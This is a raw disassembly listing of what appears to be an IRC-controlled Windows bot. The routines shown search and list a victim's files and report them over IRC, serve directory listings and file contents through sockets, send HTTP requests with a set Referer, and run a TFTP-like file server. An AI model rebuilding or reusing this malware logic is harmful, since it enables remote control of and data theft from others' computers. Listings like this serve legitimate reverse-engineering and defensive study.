call dword_43CABC ; closesocket
push [ebp+var_B4]
call sub_4150F0
pop ecx
push edi
call dword_421048 ; ExitThread
pop edi
pop esi
sub_405ECC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406048 proc near ; CODE XREF: sub_405A96+399�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_415390
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
push eax
jz short loc_40607E
push offset aS_2 ; "\\%s"
jmp short loc_406086
; ---------------------------------------------------------------------------
loc_40607E: ; CODE XREF: sub_406048+2D�j
mov byte ptr [eax], 5Ch
push offset aS_1 ; "%s"
loc_406086: ; CODE XREF: sub_406048+34�j
lea eax, [ebp+var_10C]
push eax
call sub_415316
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_415B10
test eax, eax
pop ecx
jbe short loc_406121
mov [ebp+arg_8], 2
loc_4060B1: ; CODE XREF: sub_406048+D7�j
lea eax, [ebp+var_10C]
push eax
call sub_415B10
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_4060F1
cmp [ebp+esi+var_10C], 25h
jnz short loc_4060F1
cmp [ebp+esi+var_10B], 32h
jnz short loc_4060F1
cmp [ebp+esi+var_10A], 30h
jnz short loc_4060F1
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_40610B
; ---------------------------------------------------------------------------
loc_4060F1: ; CODE XREF: sub_406048+79�j
; sub_406048+83�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_406101
push 5Ch
pop eax
jmp short loc_406104
; ---------------------------------------------------------------------------
loc_406101: ; CODE XREF: sub_406048+B2�j
movsx eax, al
loc_406104: ; CODE XREF: sub_406048+B7�j
mov [ebp+ebx+var_210], al
loc_40610B: ; CODE XREF: sub_406048+A7�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_415B10
cmp esi, eax
pop ecx
jb short loc_4060B1
loc_406121: ; CODE XREF: sub_406048+60�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_2 ; "%s%s"
push eax
call sub_415316
lea eax, [ebp+var_314]
push offset asc_426CF0 ; "\n"
push eax
call sub_416B3F
add esp, 18h
lea eax, [ebp+var_314]
push eax
call dword_421094 ; GetFileAttributesA
xor esi, esi
inc esi
cmp eax, 10h
jz short loc_40616F
cmp eax, 0FFFFFFFFh
jnz short loc_406172
push [ebp+arg_0]
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_40616F: ; CODE XREF: sub_406048+11B�j
mov [ebp+var_4], esi
loc_406172: ; CODE XREF: sub_406048+120�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_40617F
mov [ebp+var_4], esi
loc_40617F: ; CODE XREF: sub_406048+132�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_4061F9
cmp [ebp+arg_C], edi
jz short loc_4061ED
lea eax, [ebp+var_314]
push offset asc_426CEC ; "*"
push eax
call sub_415A30
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_415316
lea eax, [ebp+var_210]
push eax
call sub_406A35
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_415316
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_406248
; ---------------------------------------------------------------------------
loc_4061ED: ; CODE XREF: sub_406048+14E�j
push ebx
loc_4061EE: ; CODE XREF: sub_406048+125�j
call dword_43CABC ; closesocket
jmp loc_4062DE
; ---------------------------------------------------------------------------
loc_4061F9: ; CODE XREF: sub_406048+149�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call dword_421078 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_406248
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_415316
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call dword_421090 ; GetFileSize
push esi
mov [ebp+var_330], eax
call dword_42106C ; CloseHandle
loc_406248: ; CODE XREF: sub_406048+1A3�j
; sub_406048+1CE�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_426CA8
push eax
call sub_415316
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_414DDA
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_441B9C[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_405ECC
push edi
push edi
call dword_42108C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_441BAC[ecx], eax
jnz short loc_4062ED
push ebx
call dword_43CABC ; closesocket
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_426C58
push eax
call sub_415316
lea eax, [ebp+var_8C4]
push eax
call sub_40B078
add esp, 10h
loc_4062DE: ; CODE XREF: sub_406048+1AC�j
; sub_406048+2AD�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4062E5: ; CODE XREF: sub_406048+2AB�j
push 5
call dword_421060 ; Sleep
loc_4062ED: ; CODE XREF: sub_406048+266�j
cmp [ebp+var_318], edi
jz short loc_4062E5
jmp short loc_4062DE
sub_406048 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062F7 proc near ; CODE XREF: sub_405ECC+153�p
; sub_40CD3A+4602�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_415390
mov edi, [ebp+arg_0]
push offset asc_426CF0 ; "\n"
push edi
call sub_416B3F
add esp, 14h
cmp [ebp+arg_8], ebx
push edi
jz short loc_406356
push [ebp+arg_8]
mov esi, 200h
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41588A
add esp, 14h
jmp loc_406452
; ---------------------------------------------------------------------------
loc_406356: ; CODE XREF: sub_4062F7+3B�j
cmp [ebp+arg_C], ebx
jz loc_406438
call sub_415B10
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
push edi
call sub_415B10
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 0Ch
jmp short loc_406452
; ---------------------------------------------------------------------------
loc_406438: ; CODE XREF: sub_4062F7+62�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 10h
loc_406452: ; CODE XREF: sub_4062F7+5A�j
; sub_4062F7+13F�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
cmp [ebp+arg_C], ebx
jz short loc_4064EA
push [ebp+arg_C]
call sub_415B10
cmp eax, 2
pop ecx
jbe short loc_4064EA
push [ebp+arg_C]
call sub_415B10
sub eax, 3
pop ecx
jz short loc_40649E
loc_406492: ; CODE XREF: sub_4062F7+1A5�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_40649E
dec eax
jnz short loc_406492
loc_40649E: ; CODE XREF: sub_4062F7+199�j
; sub_4062F7+1A2�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_416BE0
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
loc_4064EA: ; CODE XREF: sub_4062F7+17D�j
; sub_4062F7+18B�j
lea eax, [ebp+var_388]
push eax
push edi
call dword_4210A8 ; FindFirstFileA
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call dword_4210A4 ; FindNextFileA
test eax, eax
jz loc_4068E1
mov edi, 1FFh
loc_406516: ; CODE XREF: sub_4062F7+5E4�j
cmp [ebp+var_388], ebx
jz loc_4068C9
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4068C9
lea eax, [ebp+var_35C]
push offset a__1 ; "."
push eax
call sub_415730
pop ecx
test eax, eax
pop ecx
jz loc_4068C9
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call dword_4210A0 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call dword_42109C ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja loc_406613
mov ecx, offset aAm ; "AM"
movzx eax, ax
loc_406592: ; CODE XREF: sub_4062F7+322�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_415316
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_40674A
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_40661E
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41588A
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
push esi
push eax
call sub_41588A
add esp, 28h
jmp loc_40689A
; ---------------------------------------------------------------------------
loc_406613: ; CODE XREF: sub_4062F7+28D�j
movzx eax, ax
sub eax, 0Ch
jmp loc_406592
; ---------------------------------------------------------------------------
loc_40661E: ; CODE XREF: sub_4062F7+2D5�j
cmp [ebp+arg_C], ebx
jz loc_406708
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_0 ; "%s%s/"
push edi
push eax
call sub_41588A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
lea eax, [ebp+var_35C]
push eax
call sub_415B10
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
jbe short loc_4066C4
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_4066C9
; ---------------------------------------------------------------------------
loc_4066C4: ; CODE XREF: sub_4062F7+3C4�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_4066C9: ; CODE XREF: sub_4062F7+3CB�j
push edi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40688B
; ---------------------------------------------------------------------------
loc_406708: ; CODE XREF: sub_4062F7+32A�j
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41588A
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
loc_406735: ; CODE XREF: sub_4062F7+47B�j
lea eax, [ebp+var_248]
push esi
push eax
call sub_41588A
add esp, 24h
jmp loc_40689A
; ---------------------------------------------------------------------------
loc_40674A: ; CODE XREF: sub_4062F7+2C9�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_406774
push ebx
push [ebp+var_368]
call sub_40C10D
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
jmp short loc_406735
; ---------------------------------------------------------------------------
loc_406774: ; CODE XREF: sub_4062F7+459�j
cmp [ebp+arg_C], ebx
jz loc_406874
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_2 ; "%s%s"
push edi
push eax
call sub_41588A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
lea eax, [ebp+var_35C]
push eax
call sub_415B10
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
jbe short loc_40681A
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_40681F
; ---------------------------------------------------------------------------
loc_40681A: ; CODE XREF: sub_4062F7+51A�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_40681F: ; CODE XREF: sub_4062F7+521�j
push edi
push eax
call sub_41588A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
lea eax, [ebp+var_248]
push edi
push eax
call sub_41588A
add esp, 1Ch
jmp short loc_40689A
; ---------------------------------------------------------------------------
loc_406874: ; CODE XREF: sub_4062F7+480�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push esi
loc_40688B: ; CODE XREF: sub_4062F7+40C�j
lea eax, [ebp+var_248]
push eax
call sub_41588A
add esp, 18h
loc_40689A: ; CODE XREF: sub_4062F7+317�j
; sub_4062F7+44E�j ...
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
cmp [ebp+arg_8], ebx
jz short loc_4068C9
push 7D0h
call dword_421060 ; Sleep
loc_4068C9: ; CODE XREF: sub_4062F7+225�j
; sub_4062F7+240�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call dword_4210A4 ; FindNextFileA
test eax, eax
jnz loc_406516
loc_4068E1: ; CODE XREF: sub_4062F7+214�j
push [ebp+arg_0]
call dword_421098 ; FindClose
cmp [ebp+arg_8], ebx
jz short loc_406924
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40C10D
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40C10D
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_415316
add esp, 14h
jmp short loc_406952
; ---------------------------------------------------------------------------
loc_406924: ; CODE XREF: sub_4062F7+5F6�j
cmp [ebp+arg_C], ebx
lea eax, [ebp+var_248]
jz short loc_40693E
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_415316
pop ecx
pop ecx
jmp short loc_406952
; ---------------------------------------------------------------------------
loc_40693E: ; CODE XREF: sub_4062F7+636�j
push [ebp+var_8]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_415316
add esp, 10h
loc_406952: ; CODE XREF: sub_4062F7+62B�j
; sub_4062F7+645�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call dword_43CA74 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4062F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406978 proc near ; CODE XREF: sub_405ECC+135�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call dword_421078 ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_406A30
push esi
push ebx
call dword_421090 ; GetFileSize
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_406A29
loc_4069BD: ; CODE XREF: sub_406978+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_415390
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_4069DA
mov edi, [ebp+arg_4]
loc_4069DA: ; CODE XREF: sub_406978+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call dword_4210AC ; SetFilePointer
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call dword_421068 ; ReadFile
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_406A24
call dword_43C9B8 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_406A29
xor eax, eax
loc_406A24: ; CODE XREF: sub_406978+9B�j
sub [ebp+arg_4], eax
jnz short loc_4069BD
loc_406A29: ; CODE XREF: sub_406978+43�j
; sub_406978+A8�j
push ebx
call dword_42106C ; CloseHandle
loc_406A30: ; CODE XREF: sub_406978+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_406978 endp
; =============== S U B R O U T I N E =======================================
sub_406A35 proc near ; CODE XREF: sub_406048+17B�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_415B10
test eax, eax
pop ecx
jbe short loc_406A5E
loc_406A48: ; CODE XREF: sub_406A35+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_406A52
mov byte ptr [esi+edi], 2Fh
loc_406A52: ; CODE XREF: sub_406A35+17�j
push edi
inc esi
call sub_415B10
cmp esi, eax
pop ecx
jb short loc_406A48
loc_406A5E: ; CODE XREF: sub_406A35+11�j
mov eax, edi
pop edi
pop esi
retn
sub_406A35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A63 proc near ; CODE XREF: sub_40CD3A+2A1A�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call dword_43C99C ; WSAStartup
push 6
push 1
push 2
call dword_43CAA4 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call dword_43CA24 ; ntohs
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_409F7A
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_43C9CC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_406B40
mov eax, [ebp+arg_20]
cmp eax, edi
jnz short loc_406ADC
mov eax, offset byte_43B658
loc_406ADC: ; CODE XREF: sub_406A63+72�j
push esi
mov esi, 100h
push [ebp+arg_10]
push eax
lea eax, [ebp+var_110]
push [ebp+arg_1C]
push [ebp+arg_18]
push offset aSSHttp1_1Refer ; "%s %s HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
push esi
push eax
call sub_41588A
add esp, 1Ch
lea eax, [ebp+var_110]
push edi
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_110]
push eax
push ebx
call dword_43CA74 ; send
push esi
lea eax, [ebp+var_110]
push edi
push eax
call sub_4153F0
add esp, 0Ch
lea eax, [ebp+var_110]
push edi
push esi
push eax
push ebx
call dword_43CA3C ; recv
pop esi
loc_406B40: ; CODE XREF: sub_406A63+6B�j
push ebx
call dword_43CABC ; closesocket
call dword_43C984 ; WSACleanup
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_310]
push eax
call sub_415316
cmp [ebp+arg_C], edi
pop ecx
pop ecx
jnz short loc_406B80
push edi
lea eax, [ebp+var_310]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
add esp, 14h
loc_406B80: ; CODE XREF: sub_406A63+102�j
pop edi
pop ebx
leave
retn
sub_406A63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B84 proc near ; CODE XREF: sub_406B84:loc_407069�p
; DATA XREF: sub_4071B6+104�o ...
var_884 = dword ptr -884h
var_880 = dword ptr -880h
var_780 = byte ptr -780h
var_580 = byte ptr -580h
var_57F = byte ptr -57Fh
var_57E = byte ptr -57Eh
var_57D = byte ptr -57Dh
var_57C = byte ptr -57Ch
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_274 = byte ptr -274h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = byte ptr -164h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_58 = byte ptr -58h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 884h
push ebx
push esi
push edi
mov edx, [ebp+arg_0]
mov esi, offset aOctet ; "octet"
lea edi, [ebp+var_1C]
movsd
movsw
xor ebx, ebx
xor eax, eax
mov ecx, 0A9h
mov esi, edx
lea edi, [ebp+var_37C]
push ebx
inc eax
push 2
rep movsd
inc [ebp+var_16C]
push 2
mov [ebp+var_C], eax
mov [edx+2A0h], eax
call dword_43CAA4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_406C47
push 190h
call dword_421060 ; Sleep
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_780]
push offset unk_427310
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_E0], ebx
jnz short loc_406C27
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_412BD1
add esp, 14h
loc_406C27: ; CODE XREF: sub_406B84+7E�j
lea eax, [ebp+var_780]
push eax
call sub_40B078
push [ebp+var_170]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_406C47: ; CODE XREF: sub_406B84+50�j
mov eax, [ebp+var_170]
push 10h
imul eax, 234h
push ebx
mov dword_441BA4[eax], edi
lea eax, [ebp+var_44]
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_44], 2
push [ebp+var_168]
call dword_43CA24 ; ntohs
mov [ebp+var_42], ax
lea eax, [ebp+var_44]
push 10h
push eax
push edi
mov [ebp+var_40], ebx
call dword_43CA50 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_406CAC
push 1388h
call dword_421060 ; Sleep
dec [ebp+var_16C]
push [ebp+arg_0]
jmp loc_407069
; ---------------------------------------------------------------------------
loc_406CAC: ; CODE XREF: sub_406B84+10D�j
lea eax, [ebp+var_378]
push offset aRb ; "rb"
push eax
call sub_415A08
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jnz short loc_406D2A
push 190h
call dword_421060 ; Sleep
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_780]
push offset unk_4272C0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_412BD1
lea eax, [ebp+var_780]
push eax
call sub_40B078
push [ebp+var_170]
call sub_4150F0
add esp, 28h
push ebx
call dword_421048 ; ExitThread
loc_406D2A: ; CODE XREF: sub_406B84+140�j
mov esi, 200h
loc_406D2F: ; CODE XREF: sub_406B84+49F�j
mov eax, [ebp+arg_0]
cmp [eax+2A0h], ebx
jz loc_407029
mov [ebp+var_880], edi
mov edi, 80h
push edi
lea eax, [ebp+var_D8]
push ebx
push eax
mov [ebp+var_34], 5
mov [ebp+var_30], 1388h
mov [ebp+var_884], 1
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_34]
push eax
push ebx
lea eax, [ebp+var_884]
push ebx
push eax
push ebx
call dword_43CA0C ; select
test eax, eax
jle loc_40701D
mov al, byte_43B658
mov ecx, edi
mov [ebp+var_580], al
xor eax, eax
lea edi, [ebp+var_57F]
mov [ebp+var_4], 10h
rep stosd
stosw
stosb
mov edi, [ebp+var_10]
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_2C]
push eax
push ebx
